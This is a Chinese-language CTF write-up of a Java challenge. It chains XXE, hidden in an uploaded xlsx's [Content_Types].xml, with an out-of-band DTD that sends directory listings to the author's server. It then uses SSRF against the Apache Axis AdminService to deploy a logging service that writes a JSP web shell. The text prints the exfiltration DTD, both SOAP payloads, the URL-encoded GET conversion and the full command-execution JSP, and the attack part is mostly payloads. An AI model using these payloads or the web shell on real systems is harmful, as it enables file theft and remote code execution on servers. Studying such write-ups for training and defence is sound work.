根据题目提示是java xxe,先测试出xxe所在位置为xlsx的[Content_Types].xml文件
先使用xxe读取目录
payload放到excel里面
<!DOCTYPE ANY[ <!ENTITY % send SYSTEM 'http://www.liugongrui.com/ctf/xxe/test.dtd'> %send; %test; %back; ]>
test.dtd 放到自己的服务器上
<!ENTITY % file SYSTEM "netdoc:../webapps/ctffffff/backups/"> <!ENTITY % test "<!ENTITY % back SYSTEM 'http://xxxx.xxxx.xxx:8000/?file=%file;'>">
然后使用服务器监听,得到目录中的文件名,下载下来,发现是个axis服务
axis服务漏洞可以参考文章
http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/
axis的payload
第一步 创建一个randomService
POST /axis_war/services/AdminService?wsdl HTTP/1.0 Content-Type: text/xml; charset=utf-8 Accept: application/soap+xml, application/dime, multipart/related, text/* User-Agent: Axis/1.4 Host: locathost:8080 Cache-Control: no-cache Pragma: no-cache SOAPAction: "" Content-Length: 1061 <?xml version="1.0" encoding="utf-8"?> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:api="http://127.0.0.1/Integrics/Enswitch/API" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Body> <ns1:deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java" xmlns:ns1="http://xml.apache.org/axis/wsdd/"> <ns1:service name="RandomService" provider="java:RPC"> <requestFlow> <handler type="RandomLog"/> </requestFlow> <ns1:parameter name="className" value="java.util.Random"/> <ns1:parameter name="allowedMethods" value="*"/> </ns1:service> <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" > <parameter name="LogHandler.fileName" value="../webapps/ROOT/shell.jsp" /> <parameter name="LogHandler.writeToConsole" value="false" /> </handler> </ns1:deployment> </soapenv:Body> </soapenv:Envelope>
第二步,写入shell文件
POST /axis_war/services/RandomService HTTP/1.0
Content-Type: text/xml; charset=utf-8
Accept: application/soap+xml, application/dime, multipart/related, text/*
User-Agent: Axis/1.4
Host: locathost:8080
Cache-Control: no-cache
Pragma: no-cache
SOAPAction: ""
Content-Length: 874
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<api:main
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
</api:in0>
</api:main>
</soapenv:Body>
</soapenv:Envelope>上面的payload需要访问AdminService是在内网执行才可以,所以我们使用xxe进行ssrf请求,由于只能使用get,所以需要把post转化成get,转化方法参考地址 https://www.freebuf.com/vuls/135318.html
然后我们转换成功之后为
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cns1%3Adeployment+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cns1%3Aservice+name%3D%22RandomService%22+provider%3D%22java%3ARPC%22%3E+%3CrequestFlow%3E+%3Chandler+type%3D%22RandomLog%22%2F%3E+%3C%2FrequestFlow%3E+%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E+%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22*%22%2F%3E+%3C%2Fns1%3Aservice%3E+%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%3E+%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%2F%3E+%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22%2F%3E+%3C%2Fhandler%3E+%3C%2Fns1%3Adeployment"> ]> <x>&xxe;</x>
放入excel中,上传成功后访问 http://39.98.64.24:25531/axis/services/RandomService
显示如下,说明已经成功创建
然后使用bp提交post到 http://39.98.64.24:25531/axis/services/RandomService 写入文件内容
访问shell地址
可以执行命令了
flag
